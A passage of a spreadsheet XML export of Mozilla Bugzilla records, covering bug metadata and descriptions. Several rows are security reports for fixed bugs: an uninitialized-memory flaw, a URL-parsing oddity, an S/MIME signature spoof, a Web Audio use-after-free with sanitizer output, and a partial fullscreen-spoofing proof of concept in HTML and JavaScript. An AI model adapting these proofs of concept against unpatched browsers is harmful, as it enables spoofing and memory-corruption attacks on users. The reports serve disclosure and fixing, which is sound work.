      <c r="C6268" t="inlineStr">
        <is>
          <t>template/default/global/header not valid HTML 4.01</t>
        </is>
      </c>
      <c r="D6268" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:29 -0800</t>
        </is>
      </c>
      <c r="E6268" t="n">
        <v>1</v>
      </c>
      <c r="F6268" t="n">
        <v>1</v>
      </c>
      <c r="G6268" t="n">
        <v>4</v>
      </c>
      <c r="H6268" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I6268" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J6268" t="inlineStr">
        <is>
          <t>User Interface</t>
        </is>
      </c>
      <c r="K6268" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6268" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M6268" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6268" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6268" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6268" t="inlineStr"/>
      <c r="Q6268" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6268" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S6268" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T6268" t="n">
        <v>1</v>
      </c>
      <c r="U6268" t="n">
        <v>0</v>
      </c>
      <c r="V6268" t="n">
        <v>8</v>
      </c>
      <c r="W6268" t="inlineStr">
        <is>
          <t>A trivial patch follows.</t>
        </is>
      </c>
      <c r="X6268" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6269">
      <c r="A6269" t="n">
        <v>1322001</v>
      </c>
      <c r="B6269" t="inlineStr">
        <is>
          <t>2016-12-03 14:09:49 -0800</t>
        </is>
      </c>
      <c r="C6269" t="inlineStr">
        <is>
          <t>Viewing a video on Facebook requires login in Firefox for Android, but not in Chrome</t>
        </is>
      </c>
      <c r="D6269" t="inlineStr">
        <is>
          <t>2024-03-07 12:37:51 -0800</t>
        </is>
      </c>
      <c r="E6269" t="n">
        <v>1</v>
      </c>
      <c r="F6269" t="n">
        <v>1</v>
      </c>
      <c r="G6269" t="n">
        <v>2</v>
      </c>
      <c r="H6269" t="inlineStr">
        <is>
          <t>Client Software</t>
        </is>
      </c>
      <c r="I6269" t="inlineStr">
        <is>
          <t>Web Compatibility</t>
        </is>
      </c>
      <c r="J6269" t="inlineStr">
        <is>
          <t>Site Reports</t>
        </is>
      </c>
      <c r="K6269" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6269" t="inlineStr">
        <is>
          <t>Other</t>
        </is>
      </c>
      <c r="M6269" t="inlineStr">
        <is>
          <t>Android</t>
        </is>
      </c>
      <c r="N6269" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6269" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6269" t="inlineStr">
        <is>
          <t>[mobile-compat-form][platform-rel-Facebook][sitewait]</t>
        </is>
      </c>
      <c r="Q6269" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R6269" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6269" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6269" t="n">
        <v>1</v>
      </c>
      <c r="U6269" t="n">
        <v>0</v>
      </c>
      <c r="V6269" t="n">
        <v>19</v>
      </c>
      <c r="W6269" t="inlineStr">
        <is>
          <t>Site: https://www.facebook.com/sarielpl/videos/10155531506028696/
Viewing a video on Facebook requires login in Firefox for Android, but not in Chrome
:: Steps To Reproduce
Go to:
https://www.facebook.com/sarielpl/videos/10155531506028696/
Click on the video.
:: Expected Result
Video should Play
:: Actual Result
Page gets redirected to login page.
:: Additional Information
Software Version: 51.0b5/any
Device Information: Sony Xperia Z3 compact
Reporter's User Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0</t>
        </is>
      </c>
      <c r="X6269" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="6270">
      <c r="A6270" t="n">
        <v>1191463</v>
      </c>
      <c r="B6270" t="inlineStr">
        <is>
          <t>2015-08-05 11:56:15 -0700</t>
        </is>
      </c>
      <c r="C6270" t="inlineStr">
        <is>
          <t>Mishandling return status in ReadbackResultWriterD3D11::Run might cause memory-safety bug</t>
        </is>
      </c>
      <c r="D6270" t="inlineStr">
        <is>
          <t>2024-05-30 09:04:07 -0700</t>
        </is>
      </c>
      <c r="E6270" t="n">
        <v>1</v>
      </c>
      <c r="F6270" t="n">
        <v>1</v>
      </c>
      <c r="G6270" t="n">
        <v>3</v>
      </c>
      <c r="H6270" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6270" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6270" t="inlineStr">
        <is>
          <t>Graphics</t>
        </is>
      </c>
      <c r="K6270" t="inlineStr">
        <is>
          <t>39 Branch</t>
        </is>
      </c>
      <c r="L6270" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6270" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6270" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6270" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6270" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main41+][adv-esr38.3+]</t>
        </is>
      </c>
      <c r="Q6270" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6270" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6270" t="inlineStr">
        <is>
          <t>mozilla43</t>
        </is>
      </c>
      <c r="T6270" t="n">
        <v>1</v>
      </c>
      <c r="U6270" t="n">
        <v>0</v>
      </c>
      <c r="V6270" t="n">
        <v>9</v>
      </c>
      <c r="W6270" t="inlineStr">
        <is>
          <t>ReadbackResultWriterD3D11::Run (gfx\layers\d3d11\ReadbackManagerD3D11.cpp) mishandles failure status from ID3D10Texture2D::Map. This might cause it to use a pointer and other data from uninitialized memory to create a surface, which is then used to read (and possibly write?) data from/to memory:
41:  NS_IMETHODIMP Run()
42:  {
43:    D3D10_TEXTURE2D_DESC desc;
44:    mTask-&gt;mReadbackTexture-&gt;GetDesc(&amp;desc);
45:
46:    D3D10_MAPPED_TEXTURE2D mappedTex;
47:    // We know this map will immediately succeed, as we've already mapped this
48:    // copied data on our task thread.
49:    HRESULT hr = mTask-&gt;mReadbackTexture-&gt;Map(0, D3D10_MAP_READ, 0, &amp;mappedTex);
50:
51:    if (FAILED(hr)) {
52:      mTask-&gt;mSink-&gt;ProcessReadback(nullptr);
53:    }
54:
55:    {
56:      RefPtr&lt;DataSourceSurface&gt; surf =
57:        Factory::CreateWrappingDataSourceSurface((uint8_t*)mappedTex.pData, mappedTex.RowPitch,
58:                                                 IntSize(desc.Width, desc.Height),
59:                                                 SurfaceFormat::B8G8R8X8);
60:
61:      mTask-&gt;mSink-&gt;ProcessReadback(surf);
62:
63:      MOZ_ASSERT(surf-&gt;hasOneRef());
64:    }
65:
66:    mTask-&gt;mReadbackTexture-&gt;Unmap(0);
67:
68:    return NS_OK;
69:  }
First lines 47-8 assert that Map cannot fail, but then lines 51-3 attempt to handle failure. However, they do so imcompletely (should there be a "return &lt;some status&gt;;" following line 52? Or has an "else" accidentally been elided from line 54?) leaving lines 57-9 using the uninitialized struct mappedTex. Despite the comments on line 47-8, probably OOM, device failure, and possibly other conditions can cause Map to fail even under the conditions under which Run runs.</t>
        </is>
      </c>
      <c r="X6270" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6271">
      <c r="A6271" t="n">
        <v>425046</v>
      </c>
      <c r="B6271" t="inlineStr">
        <is>
          <t>2008-03-25 12:19:40 -0700</t>
        </is>
      </c>
      <c r="C6271" t="inlineStr">
        <is>
          <t>URLs containing 0x01 are interpreted very oddly - possible overflow bug?</t>
        </is>
      </c>
      <c r="D6271" t="inlineStr">
        <is>
          <t>2009-01-13 11:09:31 -0800</t>
        </is>
      </c>
      <c r="E6271" t="n">
        <v>1</v>
      </c>
      <c r="F6271" t="n">
        <v>1</v>
      </c>
      <c r="G6271" t="n">
        <v>3</v>
      </c>
      <c r="H6271" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6271" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6271" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K6271" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6271" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M6271" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6271" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6271" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6271" t="inlineStr">
        <is>
          <t>[sg:investigate]</t>
        </is>
      </c>
      <c r="Q6271" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6271" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6271" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T6271" t="n">
        <v>1</v>
      </c>
      <c r="U6271" t="n">
        <v>0</v>
      </c>
      <c r="V6271" t="n">
        <v>12</v>
      </c>
      <c r="W6271" t="inlineStr">
        <is>
          <t>User-Agent:       Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080129 Iceweasel/2.0.0.12 (Debian-2.0.0.12-2)
Build Identifier: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.12) Gecko/20080129 Iceweasel/2.0.0.12 (Debian-2.0.0.12-2)
This tag:
    &lt;a href=&amp;#1;http://yahoo.com/space&amp;#32;space&amp;#32;here&gt;linky&lt;/a&gt;
genrates this link text:
    htt:///yahoo.co/m/space%20space%20her
there's a ^A at the beginning of that, if you can't see it here.
What is wrong with this?  Let me count the ways:
    htt: instead of http:
    three slashes instead of two before "yahoo"
    slash in the middle of "com"
    missing "e" at the very end
I'm a C programmer and this smells like the kind of result that could spring from a potential buffer overflow bug.  However I have no evidence that an overflow is actually happening.  I tag this bug "Security" out of caution.
BTW this link works in Outlook - not that I would suggest for a second that you imitate Outlook!  But that's why I was testing it.
Reproducible: Always
Steps to Reproduce:
1. Paste the above link tag into HTML
2. View it
3. "Copy link location" from link
Actual Results:  
htt:///yahoo.co/m/space%20space%20her  (note leading ^A)
Expected Results:  
http://yahoo.com/space%20space%20here  (possibly with leading ^A)</t>
        </is>
      </c>
      <c r="X6271" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6272">
      <c r="A6272" t="n">
        <v>1507218</v>
      </c>
      <c r="B6272" t="inlineStr">
        <is>
          <t>2018-11-14 09:38:24 -0800</t>
        </is>
      </c>
      <c r="C6272" t="inlineStr">
        <is>
          <t>Wrong Thunderbird S/MIME signature status shown, if CMS signed data has data content.</t>
        </is>
      </c>
      <c r="D6272" t="inlineStr">
        <is>
          <t>2020-08-08 09:37:07 -0700</t>
        </is>
      </c>
      <c r="E6272" t="n">
        <v>1</v>
      </c>
      <c r="F6272" t="n">
        <v>1</v>
      </c>
      <c r="G6272" t="n">
        <v>3</v>
      </c>
      <c r="H6272" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6272" t="inlineStr">
        <is>
          <t>MailNews Core</t>
        </is>
      </c>
      <c r="J6272" t="inlineStr">
        <is>
          <t>Security: S/MIME</t>
        </is>
      </c>
      <c r="K6272" t="inlineStr">
        <is>
          <t>60</t>
        </is>
      </c>
      <c r="L6272" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6272" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6272" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6272" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6272" t="inlineStr"/>
      <c r="Q6272" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6272" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6272" t="inlineStr">
        <is>
          <t>Thunderbird 67.0</t>
        </is>
      </c>
      <c r="T6272" t="n">
        <v>1</v>
      </c>
      <c r="U6272" t="n">
        <v>0</v>
      </c>
      <c r="V6272" t="n">
        <v>56</v>
      </c>
      <c r="W6272" t="inlineStr">
        <is>
          <t>Created attachment 9025094
eContentConfusion.eml
User Agent: Mozilla/5.0 (X11; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0
Steps to reproduce:
Build a special *.eml file with conflicting requirements. I used the der2ascii tool¹ to create this email. The error is further explained in the uploaded file itself.
¹ https://github.com/google/der-ascii
Actual results:
The email is showed as being signed by Damian Poddebniak (me), even though the text can be freely changed.
Expected results:
Error out due to "conflicting requirements" OR display of the verified content only.</t>
        </is>
      </c>
      <c r="X6272" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6273">
      <c r="A6273" t="n">
        <v>1020411</v>
      </c>
      <c r="B6273" t="inlineStr">
        <is>
          <t>2014-06-04 09:25:01 -0700</t>
        </is>
      </c>
      <c r="C6273" t="inlineStr">
        <is>
          <t>Heap-use-after-free in nsRefPtr&lt;mozilla::MediaInputPort&gt;::operator</t>
        </is>
      </c>
      <c r="D6273" t="inlineStr">
        <is>
          <t>2024-05-30 08:35:09 -0700</t>
        </is>
      </c>
      <c r="E6273" t="n">
        <v>1</v>
      </c>
      <c r="F6273" t="n">
        <v>1</v>
      </c>
      <c r="G6273" t="n">
        <v>3</v>
      </c>
      <c r="H6273" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6273" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6273" t="inlineStr">
        <is>
          <t>Web Audio</t>
        </is>
      </c>
      <c r="K6273" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6273" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M6273" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N6273" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O6273" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6273" t="inlineStr">
        <is>
          <t>[adv-main31+]</t>
        </is>
      </c>
      <c r="Q6273" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6273" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S6273" t="inlineStr">
        <is>
          <t>mozilla33</t>
        </is>
      </c>
      <c r="T6273" t="n">
        <v>1</v>
      </c>
      <c r="U6273" t="n">
        <v>0</v>
      </c>
      <c r="V6273" t="n">
        <v>18</v>
      </c>
      <c r="W6273" t="inlineStr">
        <is>
          <t>Created attachment 8434245
repro-file
Tested on:
OS: Ubuntu 12.04
Firefox: ASAN build from https://ftp.mozilla.org/pub/mozilla.org/firefox/tinderbox-builds/mozilla-central-linux64-asan/1401864017/
Note:
To reproduce this issue you need two html-files. The runner loads the actual repro-file into iframe to trigger the crash. You might need to adjust the timing of "setTimeout(reload,50)" in the runner.
The timing seems to be CPU related and with 50ms timing I got crash reliably with local ASAN opt-build, but was barely able to trigger the crash with the ASAN opt-build from tinderbox.
With ASAN debug-build I only managed to hit 100% CPU load and no crash on my laptop, but Christoph (cdiehl) was able to reproduce also with debug-build. 
Because of the nature of the bug, I'm not able to minimize the repro-file any further.
ASAN-output:
==17451==ERROR: AddressSanitizer: heap-use-after-free on address 0x6140000dea40 at pc 0x7f56fb21f6b8 bp 0x7fff187c8170 sp 0x7fff187c8168
READ of size 8 at 0x6140000dea40 thread T0
    #0 0x7f56fb21f6b7 in nsRefPtr&lt;mozilla::MediaInputPort&gt;::operator-&gt;() const /home/attekett/firefox/content/media/MediaStreamGraph.cpp:2490
    #1 0x7f56fb2075c8 in mozilla::MediaStreamGraphImpl::RunInStableState() /home/attekett/firefox/content/media/MediaStreamGraph.cpp:1719
    #2 0x7f56fb220c10 in mozilla::(anonymous namespace)::MediaStreamGraphStableStateRunnable::Run() /home/attekett/firefox/content/media/MediaStreamGraph.cpp:1580
    #3 0x7f56f7898e08 in nsThread::ProcessNextEvent(bool, bool*) /home/attekett/firefox/xpcom/threads/nsThread.cpp:766
    #4 0x7f56f777de09 in NS_ProcessNextEvent(nsIThread*, bool) /home/attekett/firefox/xpcom/glue/nsThreadUtils.cpp:263
    #5 0x7f56f80a23a5 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/attekett/firefox/ipc/glue/MessagePump.cpp:95
    #6 0x7f56f80311fe in MessageLoop::RunInternal() /home/attekett/firefox/ipc/chromium/src/base/message_loop.cc:229
    #7 0x7f56fa146e2f in nsBaseAppShell::Run() /home/attekett/firefox/widget/xpwidgets/nsBaseAppShell.cpp:164
    #8 0x7f56fc9f98b6 in nsAppStartup::Run() /home/attekett/firefox/toolkit/components/startup/nsAppStartup.cpp:278
    #9 0x7f56fc869ba8 in XREMain::XRE_mainRun() /home/attekett/firefox/toolkit/xre/nsAppRunner.cpp:4012
    #10 0x7f56fc86a849 in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/attekett/firefox/toolkit/xre/nsAppRunner.cpp:4083
    #11 0x7f56fc86b18b in XRE_main /home/attekett/firefox/toolkit/xre/nsAppRunner.cpp:4297
    #12 0x479fa6 in do_main(int, char**, nsIFile*) /home/attekett/firefox/browser/app/nsBrowserApp.cpp:282
    #13 0x7f570548d76c in ?? ??:0
    #14 0x479448 in _start ??:0
0x6140000dea40 is located 0 bytes inside of 448-byte region [0x6140000dea40,0x6140000dec00)
freed by thread T0 here:
    #0 0x45f64f in __interceptor_free _asan_rtl_
    #1 0x7f56fb279bed in mozilla::dom::AudioNode::DisconnectFromGraph() /home/attekett/firefox/content/media/webaudio/AudioNode.cpp:176
    #2 0x7f56fb27392d in mozilla::dom::AudioNode::Release() /home/attekett/firefox/content/media/webaudio/AudioNode.cpp:44
    #3 0x7f56fb279a0d in ~nsRefPtr /home/attekett/firefox/objdir-ff-asan/content/media/webaudio/../../../dist/include/nsAutoPtr.h:870
    #4 0x7f56fb27392d in mozilla::dom::AudioNode::Release() /home/attekett/firefox/content/media/webaudio/AudioNode.cpp:44
    #5 0x7f56fb28f739 in nsRefPtr&lt;mozilla::dom::AudioNode&gt;::assign_assuming_AddRef(mozilla::dom::AudioNode*) /home/attekett/firefox/objdir-ff-asan/content/media/webaudio/../../../dist/include/nsAutoPtr.h:857
    #6 0x7f56fb2075c8 in mozilla::MediaStreamGraphImpl::RunInStableState() /home/attekett/firefox/content/media/MediaStreamGraph.cpp:1719
    #7 0x7f56fb220c10 in mozilla::(anonymous namespace)::MediaStreamGraphStableStateRunnable::Run() /home/attekett/firefox/content/media/MediaStreamGraph.cpp:1580
    #8 0x7f56f7898e08 in nsThread::ProcessNextEvent(bool, bool*) /home/attekett/firefox/xpcom/threads/nsThread.cpp:766
    #9 0x7f56f777de09 in NS_ProcessNextEvent(nsIThread*, bool) /home/attekett/firefox/xpcom/glue/nsThreadUtils.cpp:263
    #10 0x7f56f80a23a5 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/attekett/firefox/ipc/glue/MessagePump.cpp:95
    #11 0x7f56f80311fe in MessageLoop::RunInternal() /home/attekett/firefox/ipc/chromium/src/base/message_loop.cc:229
    #12 0x7f56fa146e2f in nsBaseAppShell::Run() /home/attekett/firefox/widget/xpwidgets/nsBaseAppShell.cpp:164
    #13 0x7f56fc9f98b6 in nsAppStartup::Run() /home/attekett/firefox/toolkit/components/startup/nsAppStartup.cpp:278
    #14 0x7f56fc869ba8 in XREMain::XRE_mainRun() /home/attekett/firefox/toolkit/xre/nsAppRunner.cpp:4012
    #15 0x7f56fc86a849 in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/attekett/firefox/toolkit/xre/nsAppRunner.cpp:4083
    #16 0x7f56fc86b18b in XRE_main /home/attekett/firefox/toolkit/xre/nsAppRunner.cpp:4297
    #17 0x479fa6 in do_main(int, char**, nsIFile*) /home/attekett/firefox/browser/app/nsBrowserApp.cpp:282
    #18 0x7f570548d76c in ?? ??:0
previously allocated by thread T0 here:
    #0 0x45f887 in __interceptor_malloc _asan_rtl_
    #1 0x7f5706847b63 in moz_xmalloc /home/attekett/firefox/memory/mozalloc/mozalloc.cpp:52
    #2 0x7f56fb20e624 in operator new(unsigned long) /home/attekett/firefox/objdir-ff-asan/content/media/../../dist/include/mozilla/mozalloc.h:201
    #3 0x7f56fb28b833 in ConvolverNode /home/attekett/firefox/content/media/webaudio/ConvolverNode.cpp:194
    #4 0x7f56fb27e787 in mozilla::dom::AudioContext::CreateConvolver() /home/attekett/firefox/content/media/webaudio/AudioContext.cpp:342
    #5 0x7f56f902d840 in mozilla::dom::AudioContextBinding::createConvolver(JSContext*, JS::Handle&lt;JSObject*&gt;, mozilla::dom::AudioContext*, JSJitMethodCallArgs const&amp;) /home/attekett/firefox/objdir-ff-asan/dom/bindings/./AudioContextBinding.cpp:750
    #6 0x7f56f9f2c7c6 in mozilla::dom::GenericBindingMethod(JSContext*, unsigned int, JS::Value*) /home/attekett/firefox/dom/bindings/BindingUtils.cpp:2350
    #7 0x7f56fe7d4c13 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&amp;) /home/attekett/firefox/js/src/jscntxtinlines.h:239
    #8 0x7f56fe7c7b75 in Interpret(JSContext*, js::RunState&amp;) /home/attekett/firefox/js/src/vm/Interpreter.cpp:2561
    #9 0x7f56fe7ab56c in js::RunScript(JSContext*, js::RunState&amp;) /home/attekett/firefox/js/src/vm/Interpreter.cpp:402
    #10 0x7f56fe7881cb in js::ExecuteKernel(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value const&amp;, js::ExecuteType, js::AbstractFramePtr, JS::Value*) /home/attekett/firefox/js/src/vm/Interpreter.cpp:610
    #11 0x7f56fe7d6d4e in js::Execute(JSContext*, JS::Handle&lt;JSScript*&gt;, JSObject&amp;, JS::Value*) /home/attekett/firefox/js/src/vm/Interpreter.cpp:646
    #12 0x7f56fe3ee424 in Evaluate(JSContext*, JS::Handle&lt;JSObject*&gt;, JS::ReadOnlyCompileOptions const&amp;, JS::SourceBufferHolder&amp;, JS::Value*) /home/attekett/firefox/js/src/jsapi.cpp:4998
    #13 0x7f56fa624675 in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, nsJSUtils::EvaluateOptions const&amp;, JS::MutableHandle&lt;JS::Value&gt;, void**) /home/attekett/firefox/dom/base/nsJSUtils.cpp:256
    #14 0x7f56fa625514 in nsJSUtils::EvaluateString(JSContext*, JS::SourceBufferHolder&amp;, JS::Handle&lt;JSObject*&gt;, JS::CompileOptions&amp;, void**) /home/attekett/firefox/dom/base/nsJSUtils.cpp:322
    #15 0x7f56faea6a77 in nsScriptLoader::EvaluateScript(nsScriptLoadRequest*, JS::SourceBufferHolder&amp;, void**) /home/attekett/firefox/content/base/src/nsScriptLoader.cpp:1172
    #16 0x7f56faea41dd in nsScriptLoader::ProcessRequest(nsScriptLoadRequest*, void**) /home/attekett/firefox/content/base/src/nsScriptLoader.cpp:1002
    #17 0x7f56fae9f280 in nsScriptLoader::ProcessScriptElement(nsIScriptElement*) /home/attekett/firefox/content/base/src/nsScriptLoader.cpp:812
    #18 0x7f56fae9bb32 in nsScriptElement::MaybeProcessScript() /home/attekett/firefox/content/base/src/nsScriptElement.cpp:140
    #19 0x7f56fa4676a0 in nsCOMPtr&lt;nsIScriptElement&gt;::operator-&gt;() const /home/attekett/firefox/objdir-ff-asan/parser/html/../../dist/include/nsIScriptElement.h:220
    #20 0x7f56fa46636f in nsHtml5TreeOpExecutor::RunFlushLoop() /home/attekett/firefox/parser/html/nsHtml5TreeOpExecutor.cpp:484
    #21 0x7f56fa48b53b in nsHtml5ExecutorFlusher::Run() /home/attekett/firefox/parser/html/nsHtml5StreamParser.cpp:126
    #22 0x7f56f7898e08 in nsThread::ProcessNextEvent(bool, bool*) /home/attekett/firefox/xpcom/threads/nsThread.cpp:766
    #23 0x7f56f777de09 in NS_ProcessNextEvent(nsIThread*, bool) /home/attekett/firefox/xpcom/glue/nsThreadUtils.cpp:263
    #24 0x7f56f80a23a5 in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/attekett/firefox/ipc/glue/MessagePump.cpp:95
    #25 0x7f56f80311fe in MessageLoop::RunInternal() /home/attekett/firefox/ipc/chromium/src/base/message_loop.cc:229
    #26 0x7f56fa146e2f in nsBaseAppShell::Run() /home/attekett/firefox/widget/xpwidgets/nsBaseAppShell.cpp:164
    #27 0x7f56fc9f98b6 in nsAppStartup::Run() /home/attekett/firefox/toolkit/components/startup/nsAppStartup.cpp:278
    #28 0x7f56fc869ba8 in XREMain::XRE_mainRun() /home/attekett/firefox/toolkit/xre/nsAppRunner.cpp:4012
    #29 0x7f56fc86a849 in XREMain::XRE_main(int, char**, nsXREAppData const*) /home/attekett/firefox/toolkit/xre/nsAppRunner.cpp:4083
SUMMARY: AddressSanitizer: heap-use-after-free ??:0 ??
Shadow bytes around the buggy address:
  0x0c2880013cf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2880013d00: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
  0x0c2880013d10: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2880013d20: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c2880013d30: 00 00 00 00 00 00 00 00 00 05 fa fa fa fa fa fa
=&gt;0x0c2880013d40: fa fa fa fa fa fa fa fa[fd]fd fd fd fd fd fd fd
  0x0c2880013d50: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2880013d60: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2880013d70: fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd fd
  0x0c2880013d80: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c2880013d9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iguous container OOB:fc
  ASan internal:           fe
==17451==ABORTING</t>
        </is>
      </c>
      <c r="X6273" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="6274">
      <c r="A6274" t="n">
        <v>1821884</v>
      </c>
      <c r="B6274" t="inlineStr">
        <is>
          <t>2023-03-11 19:20:02 -0800</t>
        </is>
      </c>
      <c r="C6274" t="inlineStr">
        <is>
          <t>File Open Dialog hide fullscreen notification</t>
        </is>
      </c>
      <c r="D6274" t="inlineStr">
        <is>
          <t>2024-07-31 03:36:57 -0700</t>
        </is>
      </c>
      <c r="E6274" t="n">
        <v>1</v>
      </c>
      <c r="F6274" t="n">
        <v>1</v>
      </c>
      <c r="G6274" t="n">
        <v>3</v>
      </c>
      <c r="H6274" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I6274" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J6274" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K6274" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L6274" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M6274" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N6274" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O6274" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P6274" t="inlineStr">
        <is>
          <t>[reporter-external] [client-bounty-form] [verif?] [reminder-esr-uplift 2023-07-05] [adv-main116+] [adv-esr115.2+]</t>
        </is>
      </c>
      <c r="Q6274" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R6274" t="inlineStr">
        <is>
          <t>S3</t>
        </is>
      </c>
      <c r="S6274" t="inlineStr">
        <is>
          <t>116 Branch</t>
        </is>
      </c>
      <c r="T6274" t="n">
        <v>1</v>
      </c>
      <c r="U6274" t="n">
        <v>0</v>
      </c>
      <c r="V6274" t="n">
        <v>47</v>
      </c>
      <c r="W6274" t="inlineStr">
        <is>
          <t>Created attachment 9322577
poc fileupload firefox.mp4
I found a vulnerability in firefox 110.0.1 (64-bit)  (i tested on windows OS) where a safety browsing alert notification can cover fullscreen notifications which can lead to spoofs.
step to reproduces:
1. open http://103.186.0.20/fileupload.html
2. press "Enter" on keyboard  2 times 
mitigation: 
Exit fullscreen when file dialog prompt is shown.
code (HTML file) : 
&lt;html&gt;
    &lt;head&gt; 
        &lt;script&gt;
            function fullscreen()
            {
                         document.getElementById("xx").requestFullscreen().then(function() {
                          document.getElementById('fileid').focus();   
                          document.getElementById("fileid").focus();    
              })
                .catch(function(error) {
                                                // element could not enter fullscreen mode
                                                // error message
                                                console.log(error.message);
                });
                document.getElementById("fileid").focus();
            }
        &lt;/script&gt; 
    &lt;/head&gt;
